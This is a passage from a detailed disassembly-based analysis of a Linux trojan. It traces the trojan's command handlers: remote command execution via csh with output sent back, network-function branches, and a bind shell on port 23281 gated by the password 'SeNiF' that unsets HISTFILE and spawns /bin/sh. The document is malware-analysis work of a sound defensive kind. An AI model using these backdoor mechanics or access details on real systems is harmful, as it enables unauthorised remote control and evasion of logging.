there is a loop that continuously reads 0x18e bytes from the file
and sends the number of bytes read, then reads another 0x18e bytes
(if it is available) then sends that..etc..etc.., then the
purpose of %edi is realised. As the first packet is created, the
2nd byte is set to a 3, and %edi is set to 1. Changing %edi like
this enables the trojan to know to send the next section of up to
0x18e with the 2nd byte set to a 4. This is undoubtedly for the
benefit of any client listening to the response. We can
immediately assume something about the client from this, but we'll
look at client conclusions later.
A call to what we currently believe to be a usleep()
implementation is then done with a 0x61a80 sleep time.
If we finally finish reading all the data from the redirection
file, we end up falling out of the loop at and end up at
0x80486f9.
From here:
0x80486f9: movl 0xffffbb24(%ebp),%edx
0x80486ff: pushl %edx
0x8048700: call 0x804f540
The function call is unknown at this time, but 0xffffbb24(%ebp)
looks familiar, and looking back to the fopen() and fread(), this
would have to be the file descriptor.
One could immediately assume this function call is an fclose(),
but even i'm not into those sort of jumpy assumptions.
Following the long call chain associated with this function
reveals nothing! It is an extremely long fuction, with the only
system call found being munmap(). A lot of variable calls are
made which make tracking this function extremely difficult.
One would have been hoping for a %eax of 6 with an int $0x80 to
show up, but it was not to be. It's not enough to simply call it
a definite fclose() simply because it 'fits' into what one would
expect. The author could have buggy code! But a massive
assumption will be needed for the moment until runtime debugging
can confirm or deny...
Returning back to the case code at 0x8048705:
0x8048705: pushl $0x80675e6
0x804870a: call 0x80573bc
(gdb) x/1s 0x80675e6
0x80675e6: "/tmp/.hj237349"
A file delete would fit in nicely here too, BUT :)
Once again 0x80573bc is unidentified soooo.....
0x80573c0: movl $0xa,%eax
0x80573c8: int $0x80
This seems to be the only thing this function does. Wow. Just
when i was losing faith in disassembling calls to see what they
do, one works out. This upon consultation with ones asm/unistd.h
shows it to be an unlink("/tmp/.hj237349").
Next please:
0x8048712: pushl $0x0
0x8048714: call 0x8057554
Another function we have no references for. So we follow and:
0x8057558: movl $0x1,%eax
0x8057560: int $0x80
None other than exit() code. We already have a function we
assumed was exit()...
Can be easily explained, they're both exit() code. :)
The exit() at 0x8057554 is very simplistic with no atexit() checks
so it could only be an _exit() call. This doesnt confirm the
currently assumed code at 0x8055fbc is indeed exit() however.
This use of _exit() shows us some information about the author of
this binary too. More about this in Author Conclusions later.
End of child process.
A summary of this case section is definitely needed:
Uses csh to execute a string (probably passed encoded within the
same packet)
Redirects output to /tmp/.hj237349
Opens /tmp/.hj237349
Reads /tmp/.hj237349 in 0x18e(398) byte increments
Appears to possibly 'encode' each read 398 byte buffer using
Data_Manipulation_Function_B, and passes the probable 'output'
of this function to Network_Function_A. Network_Function_A then
most likely puts the supplied buffer into a packet and forwards
it onto the blackhat.
The actual buffer construction (which would explain the odd
number of 398) seems to have 2 bytes at the front, followed by
the 398 byte fread() buffer contents.
The first byte is unknown and appears to strangely enough end up
being the first byte of the command executed. The second byte
is:
3 for the first 398 byte buffer.
4 for every buffer thereafter.
It should be remembered that the code before all this occurs
included a kill() that would occur after a 10 second sleep. In
looking up the man page for kill(), i learn something new ;)
When the pid passed to kill is 0, the signal is sent to all
processes whose group ID is the same as the sender. This is a
pretty effective way to ensure a system() command doesn't stay
running.
Pretty impressive case-section, compared to what I've seen in other
trojans anyway.
0x0804871c:
Straight into it:
0x804871c: cmpl $0x0,0x807e774
0x8048723: jne 0x8048eb8
0x807e774 is an unknown variable. Given the reference to 0x807e778,
it would be fair to believe 0x807e774 to be a maximum of 4 bytes.
We'll call it PID_Var_B [Changed to this name - you will see why in
a minute]
So the first thing this case section does, is check PID_Var_B. If
it is nonzero, it'll jmp to 0x8048eb8 which once again is the end of
the switch(), involving a sleep(), then jmping back to the recv().
Looking at the following:
0x8048729: movl $0x4,0x807e778
0x8048733: call 0x80571e8
Firstly sets 0x807e778 (We will term this as Global_C) to 4 [This
just happens to also be the switch()'s case #4 - watch this space]
The call to 0x80571e8 we have already worked out to be a fork(). So
once again it looks like we're going to fork whatever this case does
into its own process:
0x8048738: movl %eax,0x807e774
0x804873d: testl %eax,%eax
0x804873f: jne 0x8048eb8
If we are the parent process, we will end up with the PID of the
child in PID_Var_B (hence why we named it this earlier), and will
jmp back out of the switch() ready to sleep and recv() again.
If we are the child process however:
0x8048745: leal 0xffffbb44(%ebp),%edi
0x804874b: leal 0xfffff000(%ebp),%esi
0x8048751: cld
0x8048752: movl $0x3f,%ecx
0x8048757: repz movsl %ds:(%esi),%es:(%edi)
0x8048759: movsw %ds:(%esi),%es:(%edi)
0x804875b: movsb %ds:(%esi),%es:(%edi)
We copy 0x3f*4bytes(252 bytes) from 0xffffbb44(%ebp) to
0xfffff000(%ebp). A further 3 bytes are then strangely copied in
a separate method directly after.
0xffffbb44(%ebp) is an unknown, but can be assumed to mark the start
of a buffer due to the copying of a large portion of memory. The
size of this buffer is not known but should be at least 255bytes
long (the amount of data copied). This variable will be assigned
the name of Buffer_B.
The source for the data copy, 0xfffff000(%ebp), is the well known
buffer that was passed to Data_Manipulation_Function_A much earlier.
Strangely enough, yet another copy loop is started:
0x8048760: movb 0xffffbb4d(%ebx,%ebp,1),%al
0x8048767: movb %al,0xffffbb44(%ebx,%ebp,1)
0x804876e: incl %ebx
0x804876f: cmpl $0xfe,%ebx
0x8048775: jle 0x8048760
%ebx starts off at 0, The code's purpose seems to be to shift the
contents of the buffer to the left by 9 bytes. This would indicate
that Buffer_B is actually longer than 255bytes, leaving it to be at
least 254+9 bytes (263 bytes). being such an odd number, the buffer
is assumed to be somewhat larger.
After all this effort, we're left with Bufer_B containing a 9 byte
left-shifted copy of some buffer (probably decoded data) from
Data_Manipulation_Function_A.
The rest of this section focuses on setting up a call. It starts
off simple, pushing a leal of Buffer_B onto the stack so obviously
this function uses this buffer. The next bit is strange, with
single bytes starting from 0xfffff002(%ebp) to 0xfffff008(%ebp)
being pushed onto the stack, one at a time, obviously in reverse
stack order. A 0 is stacked midway too. The actual function call
looks like this:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), 0, *0xfffff006(%ebp),
*0xfffff007(%ebp), *0xfffff008(%ebp), 0xffffbb44(%ebp))
The values actually passed were movzbl'd so it's assumed they are
single bytes (makes sense considering the individual push's).
The actual function call of 0x8049174 contains several calls
including:
0x8049213: call 0x8056cf4
which matches a socket() call. The function is long and will
most certainly be analysed later in the Function Analysis section.
This call has been given the name of Network_Function_B.
After this function completes:
0x80487c0: pushl $0x0
0x80487c2: call 0x8057554
This function has already been identified as _exit(), which should
end up terminating this child process.
0x080487c8:
This case section upon first glance is almost identical to the case
code just analysed at 0x0804871c. Once again, it looks at
PID_Var_B, and if it is non-zero (might indicate something else is
running!), it will simply return back into the main recv() loop.
We set Global_C to 5 (This is also the 5th case statement...).
Otherwise, it'll fork off and do a similar copy with one difference:
0x804880c: movb 0xffffbb51(%ebx,%ebp,1),%al
0x8048813: movb %al,0xffffbb44(%ebx,%ebp,1)
0x804881a: incl %ebx
0x804881b: cmpl $0xfe,%ebx
0x8048821: jle 0x804880c
The difference? The starting position for the read. It is 13 bytes
in front, so the effect of this loop is to shift the data in
Buffer_B left by 13 bytes (as opposed to 9 in the previous case).
This code is extremely similar to the previous case statement, but
now it all changes. A different function is called, one at
0x80499f4. This function just like the one at 0x8056cf4 contains
socket calls. Therefore we will name it Network_Function_C and
analyse it in the Function Analysis section.
The stack setup makes the function call look like this:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), 0xffffbb44(%ebp))
0xffffbb44(%ebp) is of course Buffer_B. It's a bit strange the way
so many individual bytes are passed to the function when it would
have had so much less overhead to pass them as a whole.
Nevertheless, this case section finishes identical to the previous
one, with a call to 0x8057554 aka _exit().
0x08048894:
As with what seems to be standard:
0x8048894: cmpl $0x0,0x807e774
0x804889b: jne 0x8048eb8
We check PID_Var_B and if it is not zero (assumed to mean another
case section is running), this case section will terminate, and
control will be passed back to the main recv() loop.
Otherwise (if no other case section is running), we go straight into
the following:
0x80488a1: movl $0x6,0x807e778
0x807e778 matches up with our Global_C. We haven't seen this
variable since the very first case section. We set it equal to 6.
Coincidently, this is the 6th case statement (Are we seeing a
pattern yet?).
The following code is fairly easily explained:
0x80488ab: pushl $0x1
0x80488ad: pushl $0x11
0x80488af: call 0x80569bc
0x80488b4: call 0x80571e8
First call has been seen many times before, it is once again a:
signal(SIGCHLD, SIG_IGN)
The second call matches up with a fork(). For the parent process,
The following has significance:
0x80488b9: movl %eax,0x807e774
Effectively storing the PID of the child into PID_Var_B. The parent
process will then jump back into the main recv() loop while the
child continues on:
0x80488c9: call 0x805733c
0x80488ce: pushl $0x1
0x80488d0: pushl $0x11
0x80488d2: call 0x80569bc
0x805733c corresponds to an assumed setsid() and the next three
lines as before, correspond to a SIGCHLD ignore.
Now things get interesting:
0x80488d7: movw $0x2,0xffffee38(%ebp)
0x80488e0: addl $0x8,%esp
0x80488e3: movw $0xf15a,0xffffee3a(%ebp)
0x80488ec: movl $0x0,0xffffee3c(%ebp)
0x80488f6: movl $0x1,0xffffbb40(%ebp)
0xffffee38(%ebp) is an unknown at the moment, as are
0xffffee3a(%ebp), 0xffffee3c(%ebp), and 0xffffbb40(%ebp). Size
predictions of these refereces could be made, however skimming
through the rest of the code indicates no need to bother (You'll
soon see why).
0x8048900: pushl $0x0
0x8048902: pushl $0x1
0x8048904: pushl $0x2
0x8048906: call 0x8056cf4
0x804890b: movl %eax,0xffffbb38(%ebp)
0x8056cf4 is a socket() call, therefore the stack indicates:
socket(AF_INET, SOCK_STREAM, 0)
The socket descriptor is then stored at 0xffffbb38(%ebp).
Continuing:
0x8048911: pushl $0x1
0x8048913: pushl $0x11
0x8048915: call 0x80569bc
0x804891a: pushl $0x1
0x804891c: pushl $0x11
0x804891e: call 0x80569bc
Yet again, the author ignores SIGCHLD twice for some reason.
More ignores follow:
0x8048923: pushl $0x1
0x8048925: pushl $0x1
0x8048927: call 0x80569bc
0x804892c: addl $0x24,%esp
0x804892f: pushl $0x1
0x8048931: pushl $0xf
0x8048933: call 0x80569bc
0x8048938: pushl $0x1
0x804893a: pushl $0x2
0x804893c: call 0x80569bc
These are signal ignore calls for HUP, TERM, and INT.
Finally something more interesting:
0x8048941: pushl $0x4
0x8048943: leal 0xffffbb40(%ebp),%eax
0x8048949: pushl %eax
0x804894a: pushl $0x2
0x804894c: pushl $0x1
0x804894e: movl 0xffffbb38(%ebp),%ecx
0x8048954: pushl %ecx
0x8048955: call 0x8056c9c
0x8056c9c is yet unidentified, so:
0x8056cc2: movl $0xe,%edx
0x8056cca: movl $0x66,%eax
0x8056ccf: movl %edx,%ebx
0x8056cd1: int $0x80
0x66 %eax corresponds to a socketcall. The 0xe in %ebx is for a
SYS_SETSOCKOPT. Returning to case code and reconstructing the call:
setsockopt(0xffffbb38(%ebp), 1, 2, *0xffffbb40(%ebp), 4)
To put some perspective on the parameters:
setsockopt(int s, int level, int optname, const void *optval,
socklen_t optlen)
Looking at previous assignments to these memory locations, we can
now see the following:
0xffffbb38(%ebp) is the socket assigned by socket() call.
1 corresponds to a level of SOL_SOCKET
2 corresponds to an option of SO_REUSEADDR
*0xffffbb40(%ebp) was earlier set to 1
4 corresponds to the length of *0xffffbb40(%ebp).
This appears to attempt to enable the re-using of a bound socket
availability. Possibly in some way to try prevent clashes with
other applications or instances of this binary.
Netx call setup looks like this:
0x804895d: pushl $0x10
0x804895f: leal 0xffffee38(%ebp),%eax
0x8048965: pushl %eax
0x8048966: movl 0xffffbb38(%ebp),%edx
0x804896c: pushl %edx
0x804896d: call 0x8056a74
0x8056a74 is an unknown function...
0x8056a8d: movl $0x2,%edx
0x8056a95: movl $0x66,%eax
0x8056a9a: movl %edx,%ebx
0x8056a9c: int $0x80
Or rather, "was" an unknown function :)
Looking up a type 2 socketcall, shows it does a SYS_BIND. The
function does nothing else, so it's more than likely a bind()
function.
Looking at a generic bind() call:
int bind(int s, const struct sockaddr *addr, socklen_t addrlen)
Now inserting the relevant parts:
bind(*0xffffbb38(%ebp), 0xffffee38(%ebp), 0x10)
*0xffffbb38(%ebp) is self explanatory as the socket descriptor.
0xffffee38(%ebp) however should have some interesting information,
especially what port this socket is going to be bound to! This
would be fairly easy to look up during a runtime analysis, but its
not much harder to do now.
We saw earlier in this case section the following:
0x80488d7: movw $0x2,0xffffee38(%ebp)
0x80488e3: movw $0xf15a,0xffffee3a(%ebp)
0x80488ec: movl $0x0,0xffffee3c(%ebp)
sockaddr structure:
struct sockaddr
{
unsigned short sa_family;
char sa_data[14];
};
As we saw, the first byte was set to a 2, indicating a family of
AF_INET. The bind function will now use the family structure for
this type, sockaddr_in.
sockaddr_in structure:
struct sockaddr_in {
short int sin_family;
unsigned short int sin_port;
struct in_addr sin_addr;
unsigned char __pad[...];
};
The next word put into the buffer corresponds to the port. As we
saw, 0xf15a is placed into this location, which translates to....
Almost forgot byte ordering. 0xf15a would be in network byte order.
Host byte ordering is 0x5af1, which translates into 23281.
0x8048972: pushl $0x3
0x8048974: movl 0xffffbb38(%ebp),%ecx
0x804897a: pushl %ecx
0x804897b: call 0x8056b04
Once again this function is unknown, wouldn't take much to guess
what it is, but lets prove rather than guess:
0x8056b17: movl $0x4,%edx
0x8056b1f: movl $0x66,%eax
0x8056b24: movl %edx,%ebx
0x8056b26: int $0x80
As one might have expected, this is a SYS_LISTEN call. With
parameters in place, it looks like this:
listen(*0xffffbb38(%ebp), 3)
*0xffffbb38(%ebp) once again, is the socket descriptor of our
SOCK_STREAM socket that is bound to 23281.
As expected after a listen:
0x8048984: leal 0xffffbb3c(%ebp),%eax
0x804898a: pushl %eax
0x804898b: leal 0xffffee28(%ebp),%eax
0x8048991: pushl %eax
0x8048992: movl 0xffffbb38(%ebp),%edx
0x8048998: pushl %edx
0x8048999: call 0x8056a2c
As could be guessed, the code at 0x8056a2c contains:
0x8056a45: movl $0x5,%edx
0x8056a4d: movl $0x66,%eax
0x8056a52: movl %edx,%ebx
0x8056a54: int $0x80
This is a SYS_ACCEPT socketcall. Putting parameters into the right
spots:
accept(*0xffffbb38(%ebp), 0xffffee28(%ebp), 0xffffbb3c(%ebp))
First is obviously the socket, the next should be a sock_addr
structure, while the last should have been set to the size of that
structure (This was verified as done earlier at 0x8048171).
If this accept fails with a return of 0, a jump to an exit() occurs.
Otherwise, we launch straight into a call to 0x80571e8 (a fork()).
If we end up being the parent of that call, we jump back up to
0x8048984 for the next accept() call.
If we are the child:
0x80489b8: pushl $0x0
0x80489ba: pushl $0x13
0x80489bc: leal 0xffffbc44(%ebp),%eax
0x80489c2: pushl %eax
0x80489c3: movl 0xffffbb34(%ebp),%ecx
0x80489c9: pushl %ecx
0x80489ca: call 0x8056b44
0x8056b44 has already been identified as a recv() call. As such,
In trying to identify 0xffffbb34(%ebp) (which should be a socket),
we look back to just after the accept() call:
0x804899e: movl %eax,0xffffbb34(%ebp)
As is fairly obvious, the recv() is done upon the accept()'d socket.
0xffffbc44(%ebp) would be some buffer which does not seem to be used
anywhere prior.
The 0x13 indicates a read of at most 19 bytes.
Starting at 0x80489cf, something peculiar occurs. Starting at
0xffffbc44(%ebp), we look one byte at a time. It the byte matches a
0xa or a 0xd ('\n' or '\r'), we replace it with a 0. This is a
simple string termination, the strange bit occurs if the character
is NOT one of these two characters:
0x80489f7: incb 0xffffbc44(%ebx,%ebp,1)
The byte in the buffer is incremented by 1. The loop continues for
all 0x13 bytes. When this is done, we start on what looks to be a
byte for byte compare process:
0x8048a04: leal 0xffffbc44(%ebp),%esi
0x8048a0a: movl $0x8067617,%edi
0x8048a0f: movl $0x6,%ecx
0x8048a14: cld
0x8048a15: testb $0x0,%al
0x8048a17: repz cmpsb %ds:(%esi),%es:(%edi)
0x8048a19: je 0x8048a44
%esi and %edi are obviously the buffer starting points. %esi is
loaded with the buffer (that just experienced a byte-by-byte
increment). %edi:
(gdb) x/1s 0x8067617
0x8067617: "TfOjG"
%ecx is loaded with 6. This is the number of bytes that will be
compared under the repz. Coincidently, the string at 0x8067617 is
also 6 bytes long (hrmm....interesting).
Balancing the equation, since we were incrementing out input and
then comparing to "TfOjG", we can decrement the "TfOjG" characters
by 1 to find out just what input this connection is expecting.
Doing so shows the expected input to be "SeNiF". Still makes no
sense, perhaps it means something in another language.
If the comparison fails:
0x8048a1b: pushl $0x0
0x8048a1d: pushl $0x4
0x8048a1f: pushl $0x806761d
0x8048a24: movl 0xffffbb34(%ebp),%edx
0x8048a2a: pushl %edx
0x8048a2b: call 0x8056bf0
0x8056bf0 is unidentified, so:
0x8056c0f: movl $0x9,%edx
0x8056c17: movl $0x66,%eax
0x8056c1c: movl %edx,%ebx
0x8056c1e: int $0x80
This is all the function seems to do system-wise. The above
corresponds to a SYS_SEND socketcall. Looking at the values, once
again, we see the accept()'d socket, the value of 0x806761d, and 4.
4 is the number of bytes to be sent, so 0x806761d should be the
buffer to send out:
(gdb) x/4b 0x806761d
0x806761d: 0xff 0xfb 0x01 0x00
Strange bytes which do not seem to correspond to anything. The
buffer at 0x806761d appears unused prior to this, so hopefully the
contents of this buffer will become clearer later.
Keeping in line with the fail-end of the byte comparison earlier:
0x8048a30: movl 0xffffbb34(%ebp),%ecx
0x8048a36: pushl %ecx
0x8048a37: call 0x8057160
0x8048a3c: pushl $0x1
0x8048a3e: call 0x8055fbc
After the send(), it looks like we call a close() on the accept()'d
socket, followed by an exit().
The interesting things occur if the byte comparison succeeds:
0x8048a44: pushl $0x0
0x8048a46: movl 0xffffbb34(%ebp),%edx
0x8048a4c: pushl %edx
0x8048a4d: call 0x805718c
Yet again, this function is unknown:
0x8057190: movl $0x3f,%eax
0x805719b: int $0x80
Now it can be identified however, as a dup2(). The parameters
indicate the accept()'d socket is dup2()'d as stdin. The same setup
and call is done for 1, and 2 so that when they'd finished, stdin,
stdout, and stderr are all dup2()'d to the accept()'d socket.
Following this:
0x8048a6e: pushl $0x1
0x8048a70: pushl $0x8067621
0x8048a75: pushl $0x8067651
0x8048a7a: call 0x804a2a8
Another function that needs identifying, so:
0x804a2a8 calls:
0x805652c:
Does nothing of interest.
0x805bd74:
Calls 0x805ba88
Calls 0x8065cec
0x8065d1c: movl $0x5a,%eax
0x8065d23: int $0x80
Identified as an mmap()
Calls 0x805bbf4
Calls variable
0x805c290:
Calls 0x805bb34
Calls 0x8066154
0x8066158: movl $0x5b,%eax
0x8066163: int $0x80
Identified as munmap()
Calls 0x8056e64
Does nothing of Interest
Calls 0x805c944
Calls variable
So, after all that, we're left none the wiser. Hopefully the stack
will help in identification. Three values are pushed: 0x1,
0x8067621, 0x8067651. This would look like:
function(0x8067651, 0x8067621, 0x1)
Parameters:
(gdb) x/1s 0x8067621
0x8067621: "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:."
(gdb) x/1s 0x8067651
0x8067651: "PATH"
I think this gives it away as most probably a setenv(). As such it
will be assumed as setenv() for the rest of the analysis.
Continuing:
0x8048a7f: addl $0x24,%esp
0x8048a82: pushl $0x8067656
0x8048a87: call 0x804a48c
0x804a48c is also an unknown function. We'll look at the parameter
first this time (probably easier):
(gdb) x/1s 0x8067656
0x8067656: "HISTFILE"
While the function probably should be analysed from an assembly
viewpoint, it would probably turn out to be an unsetenv(). This may
need to be reviewed later to ensure nothing tricky is done, but at
this point in time, 0x804a48c is going to be assumed as unsetenv().
Continuing:
0x8048a8c: pushl $0x1
0x8048a8e: pushl $0x806765f
0x8048a93: pushl $0x8067665
0x8048a98: call 0x804a2a8
Finally, a recognisable function, one believed to be setenv(). A
quick look at the parameters:
(gdb) x/1s 0x8067665
0x8067665: "TERM"
(gdb) x/1s 0x806765f
0x806765f: "linux"
An obvious setting of terminal type to "linux". It should be noted
both this setenv() and the previous included a 1 on the stack. This
simply indicates that if a environment variable already existed, it
would be overwritten.
Continuing:
0x8048a9d: pushl $0x0
0x8048a9f: pushl $0x806766a
0x8048aa4: pushl $0x806766d
0x8048aa9: call 0x80555fc
This function is unknown, so we'll look at the parameters first:
(gdb) x/1s 0x806766d
0x806766d: "/bin/sh"
(gdb) x/1s 0x806766a
0x806766a: "sh"
Most certainly doesn't take a genius to guess what this function is,
however, we'll try prove it anyway:
Calls 0x80571b8:
0x80571bc: movl $0xb,%eax
0x80571ca: int $0x80
This corresponds to a __NR_execve call.
It must be an execl() call due to the parameters.
There appears to be further code for a close() and exit() after the
execl() call, but theoretically these wouldn't normally be called?
0x08048acc:
First up:
0x8048acc: call 0x80571e8
0x8048ad1: movl %eax,0x807e770
0x8048ad6: testl %eax,%eax
0x8048ad8: jne 0x8048eb8
Translates into a fork whereby the parent ends up with PID_Var_A
being set to the PID of the child process, and then jumps back to
the main recv() loop.
The child continues on however:
0x8048ade: call 0x805733c
0x8048ae3: pushl $0x1
0x8048ae5: pushl $0x11
0x8048ae7: call 0x80569bc
These same lines have been seen before. They simply are setsid()
followed by a signal(SIGCHLD, SIG_IGN).
Following the setup, as expected, a fork occurs:
0x8048aec: call 0x80571e8
0x8048af1: addl $0x8,%esp
0x8048af4: testl %eax,%eax
0x8048af6: je 0x8048b18
The child process jumps off to 0x8048b18, while the parent
continues:
0x8048af8: pushl $0x4b0
0x8048afd: call 0x80556cc
0x8048b02: pushl $0x9
0x8048b04: movl 0x807e770,%eax
0x8048b09: pushl %eax
0x8048b0a: call 0x80572b0
0x8048b0f: pushl $0x0
0x8048b11: call 0x8055fbc
The first call would correspond to a sleep(0x4b0). The second is a
kill(), whereby the PID to be killed is the value at 0x807e770.
This has been deemed to be PID_Var_A, but will have been set to 0
as a result of the fork() earlier. The outcome of a kill(0, 9) was
examined earlier in the case section for 0x08048590. It appears to
have an identical purpose in this instance. That is, it will see to
it that this case section will only exist for a maximum time of 1200
seconds. Following the kill, an exit() is called, thus ending this
section.
The child process of the fork at 0x8048aec will now be examined:
0x8048b1c: movb 0xfffff002(%ebx,%ebp,1),%al
0x8048b23: movb %al,0xfffff000(%ebx,%ebp,1)
0x8048b2a: incl %ebx
0x8048b2b: cmpl $0x18d,%ebx
0x8048b31: jle 0x8048b1c
The above is a loop that will repeat 0x18d times. The purpose of it
appears to be to be to shift the contents of the buffer at
0xfffff000 left by 2 bytes. This buffer is the one believed to be
an unencoded version of 0xfffff800.
Keeping in similarity with what we saw in a previous case section:
0x8048b33: movl 0xffffbb20(%ebp),%edx
0x8048b39: pushl %edx
0x8048b3a: pushl $0x8067675
0x8048b3f: leal 0xfffff800(%ebp),%ebx
0x8048b45: pushl %ebx
0x8048b46: call 0x804f808
The 0x804f808 call is currently assumed to be a sprintf(). In
looking at the parameters passed to it:
function(0xfffff800(%ebp), 0x8067675, *0xffffbb20(%ebp))
0xfffff800(%ebp) would be the destination buffer, 0x8067675 should
be the format string, and *0xffffbb20(%ebp) should be the address
of the corresponding input according to the format string.
(gdb) x/1s 0x8067675
0x8067675: "/bin/csh -f -c \"%s\" "
Indeed, the format string holds true, the buffer starting
0xfffff800(%ebp) is the same one used to initially store the
recv()'d buffer, and *0xffffbb20(%ebp) points to the buffer that was
just shifted (0xfffff000(%ebp)).
It should appear fairly obvious at this point that 0xfffff000(%ebp)
would contain some command and is more than likely some derived
command from the recv()'d packet's data.
As expected, and as seen earlier:
0x8048b4b: pushl %ebx
0x8048b4c: call 0x80557e8
0x8048b51: pushl $0x0
0x8048b53: call 0x8057554
The first call corresponds to a system() call using the string just
constructed. Following this, _exit() is called, thus ending this
case section.
It should be noted that if the system() command takes more than 1200
seconds, this case section will effectively be kill()'ed, along with
any command that was running.
0x08048b58:
This section is very short, but seems to be very important to this
binary:
0x8048b58: movl 0x807e774,%eax
0x8048b5d: testl %eax,%eax
0x8048b5f: je 0x8048eb8
0x8048b65: pushl $0x9
0x8048b67: pushl %eax
0x8048b68: call 0x80572b0
0x8048b6d: movl $0x0,0x807e774
0x8048b77: addl $0x8,%esp
0x8048b7a: jmp 0x8048eb8
PID_Var_B is the basis of this case section. If PID_Var_B is
non-zero, it will be used in a kill statement, using PID_Var_B as
the PID to be killed. Currently there have been three case sections
that use PID_Var_B. It seems to be used in a way so that only one
of these case sections can be running at any one time. While any
one of these are running, PID_Var_B will contain their PID. This
case section appears to be a way of stopping any other running case
section (minus the first two which possibly do not have ongoing
processes, or ones such as the system() sections which contain their
own kill() code.
If PID_Var_B is zero (indicating no other ongoing case section is
running), execution will immediately jump back to the main recv()
loop. If PID_Var_B is nonzero, indicating another case section is
running, the PID indicated by PID_Var_B will be killed and execution
will be returned back to the main recv() loop.
0x08048b80:
As with other case sections:
0x8048b80: cmpl $0x0,0x807e774
0x8048b87: jne 0x8048eb8
We check PID_Var_B and if it is zero (certain other sections are not
running) we continue, if not we simply return to the main recv()
loop.
Once again, we see the following similar code:
0x8048b8d: movl $0x9,0x807e778
0x8048b97: call 0x80571e8
0x8048b9c: movl %eax,0x807e774
0x8048ba1: testl %eax,%eax
0x8048ba3: jne 0x8048eb8
We set Global_C to 9 (this is the 9th case section strangely
enough...). 0x80571e8 matches up to a fork() call, with the parent
process having the PID of the child stored once again into
PID_Var_B. The parent process then continues by jumping back to the
main recv() loop.
The child then does a buffer copy:
0x8048ba9: leal 0xffffbb44(%ebp),%edi
0x8048baf: leal 0xfffff000(%ebp),%esi
0x8048bb5: cld
0x8048bb6: movl $0x3f,%ecx
0x8048bbb: repz movsl %ds:(%esi),%es:(%edi)
0x8048bbd: movsw %ds:(%esi),%es:(%edi)
0x8048bbf: movsb %ds:(%esi),%es:(%edi)
Strange method of copy, but easy to see nonetheless. This code is
identical to code seen in some earlier case sections. It seems to
copy 255 bytes of data from the buffer sent to
Data_Manipulation_Function_A into Buffer_B.
Following this, we start another loop:
0x8048bc4: movb 0xffffbb4e(%ebx,%ebp,1),%al
0x8048bcb: movb %al,0xffffbb44(%ebx,%ebp,1)
0x8048bd2: incl %ebx
0x8048bd3: cmpl $0xfe,%ebx
0x8048bd9: jle 0x8048bc4
This loop has the effect of shifting the buffer starting at
0xffffbb44 (Buffer_B) left by 10 bytes.
The long stack setup for another call then starts:
0x8048bdb: leal 0xffffbb44(%ebp),%eax
0x8048be1: pushl %eax
0x8048be2: movzbl 0xfffff009(%ebp),%eax
0x8048be9: pushl %eax
0x8048bea: movzbl 0xfffff008(%ebp),%eax
0x8048bf1: pushl %eax
0x8048bf2: movzbl 0xfffff007(%ebp),%eax
0x8048bf9: pushl %eax
0x8048bfa: movzbl 0xfffff006(%ebp),%eax
0x8048c01: pushl %eax
0x8048c02: movzbl 0xfffff005(%ebp),%eax
0x8048c09: pushl %eax
0x8048c0a: movzbl 0xfffff004(%ebp),%eax
0x8048c11: pushl %eax
0x8048c12: movzbl 0xfffff003(%ebp),%eax
0x8048c19: pushl %eax
0x8048c1a: movzbl 0xfffff002(%ebp),%eax
0x8048c21: pushl %eax
0x8048c22: call 0x8049174
This all corresponds to:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), Buffer_B)
The function at 0x8049174 contains calls to the socket() function
among others. A quick look at the function addressing list shows
this function was called in an earlier case section, and has already
been named Network_Function_B. It will be analysed in depth later.
In keeping with other function termination:
0x8048c2a: pushl $0x0
0x8048c2c: call 0x8057554
A call of _exit(0) completes this child process's life.
0x08048c34:
This section's analysis looks like it could almost be cp/pasted from
the previous one. It starts off the same:
0x8048c34: cmpl $0x0,0x807e774
0x8048c3b: jne 0x8048eb8
0x8048c41: movl $0xa,0x807e778
0x8048c4b: call 0x80571e8
0x8048c50: movl %eax,0x807e774
0x8048c55: testl %eax,%eax
0x8048c57: jne 0x8048eb8
The normal check of PID_Var_B, followed by the setting of Global_C.
Then along comes the fork() code with the PID being stored into
PID_Var_B and the parent then returning back to the main recv()
code, leaving the child to undertake the rest of the section:
0x8048c5d: leal 0xffffbb44(%ebp),%edi
0x8048c63: leal 0xfffff000(%ebp),%esi
0x8048c69: cld
0x8048c6a: movl $0x3f,%ecx
0x8048c6f: repz movsl %ds:(%esi),%es:(%edi)
0x8048c71: movsw %ds:(%esi),%es:(%edi)
0x8048c73: movsb %ds:(%esi),%es:(%edi)
The same 255 byte copy from 0xfffff000 to Buffer_B, followed by the
same byte shift code:
0x8048c78: movb 0xffffbb52(%ebx,%ebp,1),%al
0x8048c7f: movb %al,0xffffbb44(%ebx,%ebp,1)
0x8048c86: incl %ebx
0x8048c87: cmpl $0xfe,%ebx
0x8048c8d: jle 0x8048c78
In this case, shifting Buffer_B's data to the left by 14 bytes. And
in keeping with similarity, we then commence with the stack setup
for some function:
0x8048c8f: leal 0xffffbb44(%ebp),%eax
0x8048c95: pushl %eax
0x8048c96: movzbl 0xfffff00d(%ebp),%eax
0x8048c9d: pushl %eax
0x8048c9e: pushl $0x0
0x8048ca0: movzbl 0xfffff00c(%ebp),%eax
0x8048ca7: pushl %eax
0x8048ca8: movzbl 0xfffff00b(%ebp),%eax
0x8048caf: pushl %eax
0x8048cb0: movzbl 0xfffff00a(%ebp),%eax
0x8048cb7: pushl %eax
0x8048cb8: movzbl 0xfffff009(%ebp),%eax
0x8048cbf: pushl %eax
0x8048cc0: movzbl 0xfffff008(%ebp),%eax
0x8048cc7: pushl %eax
0x8048cc8: movzbl 0xfffff007(%ebp),%eax
0x8048ccf: pushl %eax
0x8048cd0: movzbl 0xfffff006(%ebp),%eax
0x8048cd7: pushl %eax
0x8048cd8: movzbl 0xfffff005(%ebp),%eax
0x8048cdf: pushl %eax
0x8048ce0: movzbl 0xfffff004(%ebp),%eax
0x8048ce7: pushl %eax
0x8048ce8: movzbl 0xfffff003(%ebp),%eax
